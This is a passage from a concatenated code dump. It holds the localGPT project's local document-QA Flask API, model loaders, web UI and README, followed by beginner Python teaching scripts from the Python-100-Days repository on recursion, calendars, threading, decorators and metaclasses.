os.makedirs(folder_path) file_path = os.path.join(folder_path, filename) file.save(file_path) return "File saved successfully", 200 @app.route("/api/run_ingest", methods=["GET"]) def run_ingest_route(): global DB global RETRIEVER global QA try: if os.path.exists(PERSIST_DIRECTORY): try: shutil.rmtree(PERSIST_DIRECTORY) except OSError as e: print(f"Error: {e.filename} - {e.strerror}.") else: print("The directory does not exist") run_langest_commands = ["python", "ingest.py"] if DEVICE_TYPE == "cpu": run_langest_commands.append("--device_type") run_langest_commands.append(DEVICE_TYPE) result = subprocess.run(run_langest_commands, capture_output=True) if result.returncode != 0: return "Script execution failed: {}".format(result.stderr.decode("utf-8")), 500 # load the vectorstore DB = Chroma( persist_directory=PERSIST_DIRECTORY, embedding_function=EMBEDDINGS, client_settings=CHROMA_SETTINGS, ) RETRIEVER = DB.as_retriever() prompt, memory = get_prompt_template(promptTemplate_type="llama", history=False) QA = RetrievalQA.from_chain_type( llm=LLM, chain_type="stuff", retriever=RETRIEVER, return_source_documents=SHOW_SOURCES, chain_type_kwargs={ "prompt": prompt, }, ) return "Script executed successfully: {}".format(result.stdout.decode("utf-8")), 200 except Exception as e: return f"Error occurred: {str(e)}", 500 @app.route("/api/prompt_route", methods=["GET", "POST"]) def prompt_route(): global QA global request_lock # Make sure to use the global lock instance user_prompt = request.form.get("user_prompt") if user_prompt: # Acquire the lock before processing the prompt with request_lock: # print(f'User Prompt: {user_prompt}') # Get the answer from the chain res = QA(user_prompt) answer, docs = res["result"], res["source_documents"] prompt_response_dict = { "Prompt": user_prompt, "Answer": answer, } prompt_response_dict["Sources"] = [] for document in docs: prompt_response_dict["Sources"].append( (os.path.basename(str(document.metadata["source"])), str(document.page_content)) ) return jsonify(prompt_response_dict), 200 else: return "No user prompt received", 400 if __name__ == "__main__": parser = argparse.ArgumentParser() parser.add_argument("--port", type=int, default=5110, help="Port to run the API on. Defaults to 5110.") parser.add_argument( "--host", type=str, default="127.0.0.1", help="Host to run the UI on. Defaults to 127.0.0.1. 
" "Set to 0.0.0.0 to make the UI externally " "accessible from other devices.", ) args = parser.parse_args() logging.basicConfig( format="%(asctime)s - %(levelname)s - %(filename)s:%(lineno)s - %(message)s", level=logging.INFO ) app.run(debug=False, host=args.host, port=args.port) File: utils.py import os import csv from datetime import datetime from constants import EMBEDDING_MODEL_NAME from langchain.embeddings import HuggingFaceInstructEmbeddings from langchain.embeddings import HuggingFaceBgeEmbeddings from langchain.embeddings import HuggingFaceEmbeddings def log_to_csv(question, answer): log_dir, log_file = "local_chat_history", "qa_log.csv" # Ensure log directory exists, create if not if not os.path.exists(log_dir): os.makedirs(log_dir) # Construct the full file path log_path = os.path.join(log_dir, log_file) # Check if file exists, if not create and write headers if not os.path.isfile(log_path): with open(log_path, mode="w", newline="", encoding="utf-8") as file: writer = csv.writer(file) writer.writerow(["timestamp", "question", "answer"]) # Append the log entry with open(log_path, mode="a", newline="", encoding="utf-8") as file: writer = csv.writer(file) timestamp = datetime.now().strftime("%Y-%m-%d %H:%M:%S") writer.writerow([timestamp, question, answer]) def get_embeddings(device_type="cuda"): if "instructor" in EMBEDDING_MODEL_NAME: return HuggingFaceInstructEmbeddings( model_name=EMBEDDING_MODEL_NAME, model_kwargs={"device": device_type}, embed_instruction="Represent the document for retrieval:", query_instruction="Represent the question for retrieving supporting documents:", ) elif "bge" in EMBEDDING_MODEL_NAME: return HuggingFaceBgeEmbeddings( model_name=EMBEDDING_MODEL_NAME, model_kwargs={"device": device_type}, query_instruction="Represent this sentence for searching relevant passages:", ) else: return HuggingFaceEmbeddings( model_name=EMBEDDING_MODEL_NAME, model_kwargs={"device": device_type}, ) File: load_models.py import sys import torch if sys.platform != "darwin": from auto_gptq import AutoGPTQForCausalLM from huggingface_hub import hf_hub_download from langchain.llms import LlamaCpp from transformers import AutoModelForCausalLM, AutoTokenizer, LlamaForCausalLM, LlamaTokenizer, BitsAndBytesConfig from constants import CONTEXT_WINDOW_SIZE, MAX_NEW_TOKENS, MODELS_PATH, N_BATCH, N_GPU_LAYERS def load_quantized_model_gguf_ggml(model_id, model_basename, device_type, logging): """ Load a GGUF/GGML quantized model using LlamaCpp. This function attempts to load a GGUF/GGML quantized model using the LlamaCpp library. If the model is of type GGML, and newer version of LLAMA-CPP is used which does not support GGML, it logs a message indicating that LLAMA-CPP has dropped support for GGML. Parameters: - model_id (str): The identifier for the model on HuggingFace Hub. - model_basename (str): The base name of the model file. - device_type (str): The type of device where the model will run, e.g., 'mps', 'cuda', etc. - logging (logging.Logger): Logger instance for logging messages. Returns: - LlamaCpp: An instance of the LlamaCpp model if successful, otherwise None. Notes: - The function uses the `hf_hub_download` function to download the model from the HuggingFace Hub. - The number of GPU layers is set based on the device type. 
""" try: logging.info("Using Llamacpp for GGUF/GGML quantized models") model_path = hf_hub_download( repo_id=model_id, filename=model_basename, resume_download=True, cache_dir=MODELS_PATH, ) kwargs = { "model_path": model_path, "n_ctx": CONTEXT_WINDOW_SIZE, "max_tokens": MAX_NEW_TOKENS, "n_batch": N_BATCH, # set this based on your GPU & CPU RAM } if device_type.lower() == "mps": kwargs["n_gpu_layers"] = 1 if device_type.lower() == "cuda": kwargs["n_gpu_layers"] = N_GPU_LAYERS # set this based on your GPU return LlamaCpp(**kwargs) except TypeError: if "ggml" in model_basename: logging.INFO("If you were using GGML model, LLAMA-CPP Dropped Support, Use GGUF Instead") return None def load_quantized_model_qptq(model_id, model_basename, device_type, logging): """ Load a GPTQ quantized model using AutoGPTQForCausalLM. This function loads a quantized model that ends with GPTQ and may have variations of .no-act.order or .safetensors in their HuggingFace repo. It will not work for Macs, as AutoGPTQ only supports Linux and Windows: - Nvidia CUDA (Windows and Linux) - AMD ROCm (Linux only) - CPU QiGen (Linux only, new and experimental) Parameters: - model_id (str): The identifier for the model on HuggingFace Hub. - model_basename (str): The base name of the model file. - device_type (str): The type of device where the model will run. - logging (logging.Logger): Logger instance for logging messages. Returns: - model (AutoGPTQForCausalLM): The loaded quantized model. - tokenizer (AutoTokenizer): The tokenizer associated with the model. Notes: - The function checks for the ".safetensors" ending in the model_basename and removes it if present. """ if sys.platform == "darwin": logging.INFO("GPTQ models will NOT work on Mac devices. Please choose a different model.") return None, None # The code supports all huggingface models that ends with GPTQ and have some variation # of .no-act.order or .safetensors in their HF repo. logging.info("Using AutoGPTQForCausalLM for quantized models") if ".safetensors" in model_basename: # Remove the ".safetensors" ending if present model_basename = model_basename.replace(".safetensors", "") tokenizer = AutoTokenizer.from_pretrained(model_id, use_fast=True) logging.info("Tokenizer loaded") model = AutoGPTQForCausalLM.from_quantized( model_id, model_basename=model_basename, use_safetensors=True, trust_remote_code=True, device_map="auto", use_triton=False, quantize_config=None, ) return model, tokenizer def load_full_model(model_id, model_basename, device_type, logging): """ Load a full model using either LlamaTokenizer or AutoModelForCausalLM. This function loads a full model based on the specified device type. If the device type is 'mps' or 'cpu', it uses LlamaTokenizer and LlamaForCausalLM. Otherwise, it uses AutoModelForCausalLM. Parameters: - model_id (str): The identifier for the model on HuggingFace Hub. - model_basename (str): The base name of the model file. - device_type (str): The type of device where the model will run. - logging (logging.Logger): Logger instance for logging messages. Returns: - model (Union[LlamaForCausalLM, AutoModelForCausalLM]): The loaded model. - tokenizer (Union[LlamaTokenizer, AutoTokenizer]): The tokenizer associated with the model. Notes: - The function uses the `from_pretrained` method to load both the model and the tokenizer. - Additional settings are provided for NVIDIA GPUs, such as loading in 4-bit and setting the compute dtype. 
""" if device_type.lower() in ["mps", "cpu"]: logging.info("Using AutoModelForCausalLM") # tokenizer = LlamaTokenizer.from_pretrained(model_id, cache_dir="./models/") # model = LlamaForCausalLM.from_pretrained(model_id, cache_dir="./models/") model = AutoModelForCausalLM.from_pretrained(model_id, # quantization_config=quantization_config, # low_cpu_mem_usage=True, # torch_dtype="auto", torch_dtype=torch.bfloat16, device_map="auto", cache_dir="./models/") tokenizer = AutoTokenizer.from_pretrained(model_id, cache_dir="./models/") else: logging.info("Using AutoModelForCausalLM for full models") tokenizer = AutoTokenizer.from_pretrained(model_id, cache_dir="./models/") logging.info("Tokenizer loaded") bnb_config = BitsAndBytesConfig( load_in_4bit=True, bnb_4bit_use_double_quant=True, bnb_4bit_quant_type="nf4", bnb_4bit_compute_dtype=torch.float16 ) model = AutoModelForCausalLM.from_pretrained( model_id, device_map="auto", torch_dtype=torch.float16, low_cpu_mem_usage=True, cache_dir=MODELS_PATH, trust_remote_code=True, # set these if you are using NVIDIA GPU quantization_config=bnb_config # load_in_4bit=True, # bnb_4bit_quant_type="nf4", # bnb_4bit_compute_dtype=torch.float16, # max_memory={0: "15GB"}, # Uncomment this line with you encounter CUDA out of memory errors ) model.tie_weights() return model, tokenizer def load_quantized_model_awq(model_id, logging): """ Load a AWQ quantized model using AutoModelForCausalLM. This function loads a quantized model that ends with AWQ. It will not work for Macs as AutoAWQ currently only supports Nvidia GPUs. Parameters: - model_id (str): The identifier for the model on HuggingFace Hub. - logging (logging.Logger): Logger instance for logging messages. Returns: - model (AutoModelForCausalLM): The loaded quantized model. - tokenizer (AutoTokenizer): The tokenizer associated with the model. """ if sys.platform == "darwin": logging.INFO("AWQ models will NOT work on Mac devices. Please choose a different model.") return None, None # The code supports all huggingface models that ends with AWQ. 
logging.info("Using AutoModelForCausalLM for AWQ quantized models") tokenizer = AutoTokenizer.from_pretrained(model_id, use_fast=True) logging.info("Tokenizer loaded") model = AutoModelForCausalLM.from_pretrained( model_id, use_safetensors=True, trust_remote_code=True, device_map="auto", ) return model, tokenizer File: localGPTUI/localGPTUI.py import argparse import os import sys import tempfile import requests from flask import Flask, render_template, request from werkzeug.utils import secure_filename sys.path.append(os.path.join(os.path.dirname(__file__), "..")) app = Flask(__name__) app.secret_key = "LeafmanZSecretKey" API_HOST = "http://localhost:5110/api" # PAGES # @app.route("/", methods=["GET", "POST"]) def home_page(): if request.method == "POST": if "user_prompt" in request.form: user_prompt = request.form["user_prompt"] print(f"User Prompt: {user_prompt}") main_prompt_url = f"{API_HOST}/prompt_route" response = requests.post(main_prompt_url, data={"user_prompt": user_prompt}) print(response.status_code) # print HTTP response status code for debugging if response.status_code == 200: # print(response.json()) # Print the JSON data from the response return render_template("home.html", show_response_modal=True, response_dict=response.json()) elif "documents" in request.files: delete_source_url = f"{API_HOST}/delete_source" # URL of the /api/delete_source endpoint if request.form.get("action") == "reset": response = requests.get(delete_source_url) save_document_url = f"{API_HOST}/save_document" run_ingest_url = f"{API_HOST}/run_ingest" # URL of the /api/run_ingest endpoint files = request.files.getlist("documents") for file in files: print(file.filename) filename = secure_filename(file.filename) with tempfile.SpooledTemporaryFile() as f: f.write(file.read()) f.seek(0) response = requests.post(save_document_url, files={"document": (filename, f)}) print(response.status_code) # print HTTP response status code for debugging # Make a GET request to the /api/run_ingest endpoint response = requests.get(run_ingest_url) print(response.status_code) # print HTTP response status code for debugging # Display the form for GET request return render_template( "home.html", show_response_modal=False, response_dict={"Prompt": "None", "Answer": "None", "Sources": [("ewf", "wef")]}, ) if __name__ == "__main__": parser = argparse.ArgumentParser() parser.add_argument("--port", type=int, default=5111, help="Port to run the UI on. Defaults to 5111.") parser.add_argument( "--host", type=str, default="127.0.0.1", help="Host to run the UI on. Defaults to 127.0.0.1. " "Set to 0.0.0.0 to make the UI externally " "accessible from other devices.", ) args = parser.parse_args() app.run(debug=False, host=args.host, port=args.port)
# LocalGPT: Secure, Local Conversations with Your Documents 🌐 [![GitHub Stars](https://img.shields.io/github/stars/PromtEngineer/localGPT?style=social)](https://github.com/PromtEngineer/localGPT/stargazers) [![GitHub Forks](https://img.shields.io/github/forks/PromtEngineer/localGPT?style=social)](https://github.com/PromtEngineer/localGPT/network/members) [![GitHub Issues](https://img.shields.io/github/issues/PromtEngineer/localGPT)](https://github.com/PromtEngineer/localGPT/issues) [![GitHub Pull Requests](https://img.shields.io/github/issues-pr/PromtEngineer/localGPT)](https://github.com/PromtEngineer/localGPT/pulls) [![License](https://img.shields.io/github/license/PromtEngineer/localGPT)](https://github.com/PromtEngineer/localGPT/blob/main/LICENSE) 🚨🚨 You can run localGPT on a pre-configured [Virtual Machine](https://bit.ly/localGPT). Make sure to use the code: PromptEngineering to get 50% off. I will get a small commision! **LocalGPT** is an open-source initiative that allows you to converse with your documents without compromising your privacy. With everything running locally, you can be assured that no data ever leaves your computer. Dive into the world of secure, local document interactions with LocalGPT. ## Features 🌟 - **Utmost Privacy**: Your data remains on your computer, ensuring 100% security. - **Versatile Model Support**: Seamlessly integrate a variety of open-source models, including HF, GPTQ, GGML, and GGUF. - **Diverse Embeddings**: Choose from a range of open-source embeddings. - **Reuse Your LLM**: Once downloaded, reuse your LLM without the need for repeated downloads. - **Chat History**: Remembers your previous conversations (in a session). - **API**: LocalGPT has an API that you can use for building RAG Applications. - **Graphical Interface**: LocalGPT comes with two GUIs, one uses the API and the other is standalone (based on streamlit). - **GPU, CPU & MPS Support**: Supports multiple platforms out of the box, Chat with your data using `CUDA`, `CPU` or `MPS` and more! ## Dive Deeper with Our Videos 🎥 - [Detailed code-walkthrough](https://youtu.be/MlyoObdIHyo) - [Llama-2 with LocalGPT](https://youtu.be/lbFmceo4D5E) - [Adding Chat History](https://youtu.be/d7otIM_MCZs) - [LocalGPT - Updated (09/17/2023)](https://youtu.be/G_prHSKX9d4) ## Technical Details 🛠️ By selecting the right local models and the power of `LangChain` you can run the entire RAG pipeline locally, without any data leaving your environment, and with reasonable performance. - `ingest.py` uses `LangChain` tools to parse the document and create embeddings locally using `InstructorEmbeddings`. It then stores the result in a local vector database using `Chroma` vector store. - `run_localGPT.py` uses a local LLM to understand questions and create answers. The context for the answers is extracted from the local vector store using a similarity search to locate the right piece of context from the docs. - You can replace this local LLM with any other LLM from the HuggingFace. Make sure whatever LLM you select is in the HF format. This project was inspired by the original [privateGPT](https://github.com/imartinez/privateGPT). ## Built Using 🧩 - [LangChain](https://github.com/hwchase17/langchain) - [HuggingFace LLMs](https://huggingface.co/models) - [InstructorEmbeddings](https://instructor-embedding.github.io/) - [LLAMACPP](https://github.com/abetlen/llama-cpp-python) - [ChromaDB](https://www.trychroma.com/) - [Streamlit](https://streamlit.io/) # Environment Setup 🌍 1. 
📥 Clone the repo using git: ```shell git clone https://github.com/PromtEngineer/localGPT.git ``` 2. 🐍 Install [conda](https://www.anaconda.com/download) for virtual environment management. Create and activate a new virtual environment. ```shell conda create -n localGPT python=3.10.0 conda activate localGPT ``` 3. 🛠️ Install the dependencies using pip To set up your environment to run the code, first install all requirements: ```shell pip install -r requirements.txt ``` ***Installing LLAMA-CPP :*** LocalGPT uses [LlamaCpp-Python](https://github.com/abetlen/llama-cpp-python) for GGML (you will need llama-cpp-python <=0.1.76) and GGUF (llama-cpp-python >=0.1.83) models. If you want to use BLAS or Metal with [llama-cpp](https://github.com/abetlen/llama-cpp-python#installation-with-openblas--cublas--clblast--metal) you can set appropriate flags: For `NVIDIA` GPUs support, use `cuBLAS` ```shell # Example: cuBLAS CMAKE_ARGS="-DLLAMA_CUBLAS=on" FORCE_CMAKE=1 pip install llama-cpp-python --no-cache-dir ``` For Apple Metal (`M1/M2`) support, use ```shell # Example: METAL CMAKE_ARGS="-DLLAMA_METAL=on" FORCE_CMAKE=1 pip install llama-cpp-python --no-cache-dir ``` For more details, please refer to [llama-cpp](https://github.com/abetlen/llama-cpp-python#installation-with-openblas--cublas--clblast--metal) ## Docker 🐳 Installing the required packages for GPU inference on NVIDIA GPUs, like gcc 11 and CUDA 11, may cause conflicts with other packages in your system. As an alternative to Conda, you can use Docker with the provided Dockerfile. It includes CUDA, your system just needs Docker, BuildKit, your NVIDIA GPU driver and the NVIDIA container toolkit. Build as `docker build -t localgpt .`, requires BuildKit. Docker BuildKit does not support GPU during *docker build* time right now, only during *docker run*. Run as `docker run -it --mount src="$HOME/.cache",target=/root/.cache,type=bind --gpus=all localgpt`. ## Test dataset For testing, this repository comes with [Constitution of USA](https://constitutioncenter.org/media/files/constitution.pdf) as an example file to use. ## Ingesting your OWN Data. Put your files in the `SOURCE_DOCUMENTS` folder. You can put multiple folders within the `SOURCE_DOCUMENTS` folder and the code will recursively read your files. ### Support file formats: LocalGPT currently supports the following file formats. LocalGPT uses `LangChain` for loading these file formats. The code in `constants.py` uses a `DOCUMENT_MAP` dictionary to map a file format to the corresponding loader. In order to add support for another file format, simply add this dictionary with the file format and the corresponding loader from [LangChain](https://python.langchain.com/docs/modules/data_connection/document_loaders/). ```shell DOCUMENT_MAP = { ".txt": TextLoader, ".md": TextLoader, ".py": TextLoader, ".pdf": PDFMinerLoader, ".csv": CSVLoader, ".xls": UnstructuredExcelLoader, ".xlsx": UnstructuredExcelLoader, ".docx": Docx2txtLoader, ".doc": Docx2txtLoader, } ``` ### Ingest Run the following command to ingest all the data. If you have `cuda` setup on your system. ```shell python ingest.py ``` You will see an output like this: <img width="1110" alt="Screenshot 2023-09-14 at 3 36 27 PM" src="https://github.com/PromtEngineer/localGPT/assets/134474669/c9274e9a-842c-49b9-8d95-606c3d80011f"> Use the device type argument to specify a given device. 
To run on `cpu` ```sh python ingest.py --device_type cpu ``` To run on `M1/M2` ```sh python ingest.py --device_type mps ``` Use `--help` for a full list of supported devices. ```sh python ingest.py --help ``` This will create a new folder called `DB` and use it for the newly created vector store. You can ingest as many documents as you want, and all will be accumulated in the local embeddings database. If you want to start from an empty database, delete the `DB` folder and re-ingest your documents. Note: When you run this for the first time, it will need internet access to download the embedding model (default: `Instructor Embedding`). In subsequent runs, no data will leave your local environment, and you can ingest data without an internet connection. ## Ask questions to your documents, locally! In order to chat with your documents, run the following command (by default, it will run on `cuda`). ```shell python run_localGPT.py ``` You can also specify the device type just like with `ingest.py` ```shell python run_localGPT.py --device_type mps # to run on Apple silicon ``` This will load the ingested vector store and embedding model. You will be presented with a prompt: ```shell > Enter a query: ``` After typing your question, hit enter. LocalGPT will take some time based on your hardware. You will get a response like the one below. <img width="1312" alt="Screenshot 2023-09-14 at 3 33 19 PM" src="https://github.com/PromtEngineer/localGPT/assets/134474669/a7268de9-ade0-420b-a00b-ed12207dbe41"> Once the answer is generated, you can ask another question without re-running the script; just wait for the prompt again. ***Note:*** When you run this for the first time, it will need an internet connection to download the LLM (default: `TheBloke/Llama-2-7b-Chat-GGUF`). After that you can turn off your internet connection, and the script will still run inference. No data gets out of your local environment. Type `exit` to finish the script. ### Extra Options with run_localGPT.py You can use the `--show_sources` flag with `run_localGPT.py` to show which chunks were retrieved by the embedding model. By default, it will show 4 different sources/chunks; the number of sources/chunks can be changed if needed. ```shell python run_localGPT.py --show_sources ``` Another option is to enable chat history. ***Note***: This is disabled by default and can be enabled by using the `--use_history` flag. The context window is limited, so keep in mind that enabling history will consume part of it and might overflow it. ```shell python run_localGPT.py --use_history ``` You can store user questions and model responses in a CSV file (`/local_chat_history/qa_log.csv`) with the `--save_qa` flag. Every interaction will be stored. ```shell python run_localGPT.py --save_qa ``` # Run the Graphical User Interface 1. Open `constants.py` in an editor of your choice and, depending on your choice, set the LLM you want to use. By default, the following model will be used: ```shell MODEL_ID = "TheBloke/Llama-2-7b-Chat-GGUF" MODEL_BASENAME = "llama-2-7b-chat.Q4_K_M.gguf" ``` 2. Open up a terminal and activate your Python environment that contains the dependencies installed from requirements.txt. 3. Navigate to the `/LOCALGPT` directory. 4. Run the following command: `python run_localGPT_API.py`. The API should begin to run. 5. Wait until everything has loaded in. You should see something like `INFO:werkzeug:Press CTRL+C to quit`. 6. Open up a second terminal and activate the same Python environment. 7. Navigate to the `/LOCALGPT/localGPTUI` directory. 8. Run the command `python localGPTUI.py`. 
9. Open up a web browser and go to the address `http://localhost:5111/`. # How to select different LLM models? To change the models you will need to set both `MODEL_ID` and `MODEL_BASENAME`. 1. Open up `constants.py` in the editor of your choice. 2. Change the `MODEL_ID` and `MODEL_BASENAME`. If you are using a quantized model (`GGML`, `GPTQ`, `GGUF`), you will need to provide `MODEL_BASENAME`. For unquantized models, set `MODEL_BASENAME` to `None`. 3. There are a number of example models from HuggingFace that have already been tested, both original trained models (ending with HF or with a .bin file in their "Files and versions") and quantized models (ending with GPTQ or with a .no-act-order or .safetensors file in their "Files and versions"). 4. For models that end with HF or have a .bin file inside their "Files and versions" on their HuggingFace page: - Make sure you have a `MODEL_ID` selected. For example -> `MODEL_ID = "TheBloke/guanaco-7B-HF"` - Go to the [HuggingFace Repo](https://huggingface.co/TheBloke/guanaco-7B-HF) 5. For models that contain GPTQ in their name and/or have a .no-act-order or .safetensors extension inside their "Files and versions" on their HuggingFace page: - Make sure you have a `MODEL_ID` selected. For example -> `MODEL_ID = "TheBloke/wizardLM-7B-GPTQ"` - Go to the corresponding [HuggingFace Repo](https://huggingface.co/TheBloke/wizardLM-7B-GPTQ) and select "Files and versions". - Pick one of the model names and set it as `MODEL_BASENAME`. For example -> `MODEL_BASENAME = "wizardLM-7B-GPTQ-4bit.compat.no-act-order.safetensors"` 6. Follow the same steps for `GGUF` and `GGML` models. # GPU and VRAM Requirements Below are the VRAM requirements for different models depending on their size (billions of parameters). The estimates in the table do not include the VRAM used by the embedding models, which use an additional 2GB-7GB of VRAM depending on the model. | Model Size (B) | float32 | float16 | GPTQ 8bit | GPTQ 4bit | | ------- | --------- | --------- | -------------- | ------------------ | | 7B | 28 GB | 14 GB | 7 GB - 9 GB | 3.5 GB - 5 GB | | 13B | 52 GB | 26 GB | 13 GB - 15 GB | 6.5 GB - 8 GB | | 32B | 130 GB | 65 GB | 32.5 GB - 35 GB | 16.25 GB - 19 GB | | 65B | 260.8 GB | 130.4 GB | 65.2 GB - 67 GB | 32.6 GB - 35 GB | # System Requirements ## Python Version To use this software, you must have Python 3.10 or later installed. Earlier versions of Python are not supported. ## C++ Compiler If you encounter an error while building a wheel during the `pip install` process, you may need to install a C++ compiler on your computer. ### For Windows 10/11 To install a C++ compiler on Windows 10/11, follow these steps: 1. Install Visual Studio 2022. 2. Make sure the following components are selected: - Universal Windows Platform development - C++ CMake tools for Windows 3. Download the MinGW installer from the [MinGW website](https://sourceforge.net/projects/mingw/). 4. Run the installer and select the "gcc" component. ### NVIDIA Driver Issues Follow this [page](https://linuxconfig.org/how-to-install-the-nvidia-drivers-on-ubuntu-22-04) to install NVIDIA drivers. ## Star History [![Star History Chart](https://api.star-history.com/svg?repos=PromtEngineer/localGPT&type=Date)](https://star-history.com/#PromtEngineer/localGPT&Date) # Disclaimer This is a test project to validate the feasibility of a fully local solution for question answering using LLMs and vector embeddings. It is not production ready, and it is not meant to be used in production. 
Vicuna-7B is based on the Llama model, so it carries the original Llama license. # Common Errors - [Torch not compatible with CUDA enabled](https://github.com/pytorch/pytorch/issues/30664) - Get the CUDA version ```shell nvcc --version ``` ```shell nvidia-smi ``` - Try installing PyTorch depending on your CUDA version ```shell conda install -c pytorch torchvision cudatoolkit=10.1 pytorch ``` - If it doesn't work, try reinstalling ```shell pip uninstall torch pip cache purge pip install torch -f https://download.pytorch.org/whl/torch_stable.html ``` - [ERROR: pip's dependency resolver does not currently take into account all the packages that are installed](https://stackoverflow.com/questions/72672196/error-pips-dependency-resolver-does-not-currently-take-into-account-all-the-pa/76604141#76604141) ```shell pip install h5py pip install typing-extensions pip install wheel ```
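- As a quick sanity check for the CUDA-related errors above, you can ask the installed PyTorch build whether it actually sees a GPU (this only verifies the Torch/CUDA pairing, nothing localGPT-specific) ```shell python -c "import torch; print(torch.cuda.is_available(), torch.version.cuda)" ```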
Python-100-Days
bf24146944745bb25c66c82307fd218abd179c6a
File: Day31-35/code/josephu.py def main(): persons = [True] * 30 counter = 0 index = 0 number = 0 while counter < 15: if persons[index]: number += 1 if number == 9: persons[index] = False number = 0 counter += 1 index += 1 index %= len(persons) for person in persons: print('基' if person else '非', end='') print() if __name__ == '__main__': main() File: Day31-35/code/dayofyear.py import sys import mycal def main(): if len(sys.argv) != 4: print('Not enough arguments') return year = int(sys.argv[1]) month = int(sys.argv[2]) day = int(sys.argv[3]) total = 0 for m in range(1, month): total += mycal.get_days(year, m) total += day print(f'{year}年{month}月{day}日是{year}年的第{total}天') if __name__ == '__main__': main() File: Day31-35/code/guess.py #!/usr/bin/python3 # coding: utf-8 from random import randint def main(): answer = randint(1, 100) while True: number = int(input('请输入: ')) if number < answer: print('大一点') elif number > answer: print('小一点') else: print('恭喜你猜对了!') break if __name__ == '__main__': main() File: Day31-35/code/mycal.py #!/usr/bin/python3 from datetime import datetime import sys def is_leap(year): return year % 4 == 0 and year % 100 != 0 or year % 400 == 0 def main(): if len(sys.argv) == 3: month = int(sys.argv[1]) year = int(sys.argv[2]) else: now = datetime.now() date = now.date month = now.month year = now.year m, y = (month, year) if month >= 3 else (month + 12, year - 1) c, y = y // 100, y % 100 w = (y + y // 4 + c // 4 - 2 * c + 26 * (m + 1) // 10) % 7 month_words = [ 'January', 'February', 'March', 'April', 'May', 'June', 'July', 'August', 'September', 'October', 'November', 'December' ] print(f'{month_words[month - 1]} {year}'.center(20)) print('Su Mo Tu We Th Fr Sa') print(' ' * 3 * w, end='') days = [ [31, 28, 31, 30, 31, 30, 31, 31, 30, 31, 30, 31], [31, 29, 31, 30, 31, 30, 31, 31, 30, 31, 30, 31] ][is_leap(year)][month - 1] for day in range(1, days + 1): print(str(day).rjust(2), end=' ') w += 1 if w == 7: print() w = 0 print() if __name__ == '__main__': main() File: Day31-35/code/homework01.py # 经典递归求解问题: # 1. 迷宫寻路 # 2. 汉诺塔(梵塔) # 3. 骑士周游 # 4. 八皇后 def f(n: int, m=1) -> int: if n == 0 or n == 1: return m return f(n - 1, n * m) def sum(n: int) -> int: if n == 1: return 1 return n + sum(n - 1) def steps(n: int, m={}) -> int: if n < 0: return 0 elif n == 0: return 1 else: try: return m[n] except: m[n] = steps(n - 1) + steps(n - 2) + steps(n - 3) return m[n] def list_depth(items: list) -> int: max_depth = 1 if isinstance(items, list) else 0 if max_depth: for item in items: if isinstance(item, list): max_depth = max(max_depth, list_depth(item) + 1) return max_depth def main(): mylist = [1, ['a', ['b', ['c']]],[100, [200, 300, [400, [500, [600, [700]]]]]]] thylist = [[], [[[]]], [[], []]] print(list_depth(mylist)) print(list_depth(thylist)) if __name__ == '__main__': main() File: Day16-20/code/example19.py """ 扩展性系统性能 - 垂直扩展 - 增加单节点处理能力 - 水平扩展 - 将单节点变成多节点(读写分离/分布式集群) 并发编程 - 加速程序执行 / 改善用户体验 耗时间的任务都尽可能独立的执行,不要阻塞代码的其他部分 - 多线程 1. 创建Thread对象指定target和args属性并通过start方法启动线程 2. 继承Thread类并重写run方法来定义线程执行的任务 3. 
创建线程池对象ThreadPoolExecutor并通过submit来提交要执行的任务 第3种方式可以通过Future对象的result方法在将来获得线程的执行结果 也可以通过done方法判定线程是否执行结束 - 多进程 - 异步I/O """ import glob import os import time from concurrent.futures import ThreadPoolExecutor from threading import Thread from PIL import Image # class ThumbnailThread(Thread): # def __init__(self, infile): # self.infile = infile # super().__init__() # def run(self): # file, ext = os.path.splitext(self.infile) # filename = file[file.rfind('/') + 1:] # for size in (32, 64, 128): # outfile = f'thumbnails/{filename}_{size}_{size}.png' # image = Image.open(self.infile) # image.thumbnail((size, size)) # image.save(outfile, format='PNG') def gen_thumbnail(infile): file, ext = os.path.splitext(infile) filename = file[file.rfind('/') + 1:] for size in (32, 64, 128): outfile = f'thumbnails/{filename}_{size}_{size}.png' image = Image.open(infile) image.thumbnail((size, size)) image.save(outfile, format='PNG') # def main(): # start = time.time() # threads = [] # for infile in glob.glob('images/*'): # # t = Thread(target=gen_thumbnail, args=(infile, )) # t = ThumbnailThread(infile) # t.start() # threads.append(t) # for t in threads: # t.join() # end = time.time() # print(f'耗时: {end - start}秒') def main(): pool = ThreadPoolExecutor(max_workers=30) futures = [] start = time.time() for infile in glob.glob('images/*'): # submit方法是非阻塞式的方法 # 即便工作线程数已经用完,submit方法也会接受提交的任务 future = pool.submit(gen_thumbnail, infile) futures.append(future) for future in futures: # result方法是一个阻塞式的方法 如果线程还没有结束 # 暂时取不到线程的执行结果 代码就会在此处阻塞 future.result() end = time.time() print(f'耗时: {end - start}秒') # shutdown也是非阻塞式的方法 但是如果已经提交的任务还没有执行完 # 线程池是不会停止工作的 shutdown之后再提交任务就不会执行而且会产生异常 pool.shutdown() if __name__ == '__main__': main() File: Day16-20/code/example09.py """ 装饰器 - 装饰器中放置的通常都是横切关注(cross-concern)功能 所谓横切关注功能就是很多地方都会用到但跟正常业务又逻辑没有必然联系的功能 装饰器实际上是实现了设计模式中的代理模式 - AOP(面向切面编程) """ from functools import wraps from random import randint from time import time, sleep import pymysql def record(output): def decorate(func): @wraps(func) def wrapper(*args, **kwargs): start = time() ret_value = func(*args, **kwargs) output(func.__name__, time() - start) return ret_value return wrapper return decorate def output_to_console(fname, duration): print('%s: %.3f秒' % (fname, duration)) def output_to_file(fname, duration): with open('log.txt', 'a') as file_stream: file_stream.write('%s: %.3f秒\n' % (fname, duration)) def output_to_db(fname, duration): con = pymysql.connect(host='localhost', port=3306, database='test', charset='utf8', user='root', password='123456', autocommit=True) try: with con.cursor() as cursor: cursor.execute('insert into tb_record values (default, %s, %s)', (fname, '%.3f' % duration)) finally: con.close() @record(output_to_console) def random_delay(min, max): sleep(randint(min, max)) def main(): for _ in range(3): # print(random_delay.__name__) random_delay(3, 5) # for _ in range(3): # # 取消掉装饰器 # random_delay.__wrapped__(3, 5) if __name__ == '__main__': main() File: Day16-20/code/example18.py """ 元 - meta 元数据 - 描述数据的数据 - metadata 元类 - 描述类的类 - metaclass - 继承自type """ import threading class SingletonMeta(type): """自定义元类""" def __init__(cls, *args, **kwargs): cls.__instance = None cls.lock = threading.Lock() super().__init__(*args, **kwargs) def __call__(cls, *args, **kwargs): if cls.__instance is None: with cls.lock: if cls.__instance is None: cls.__instance = super().__call__(*args, 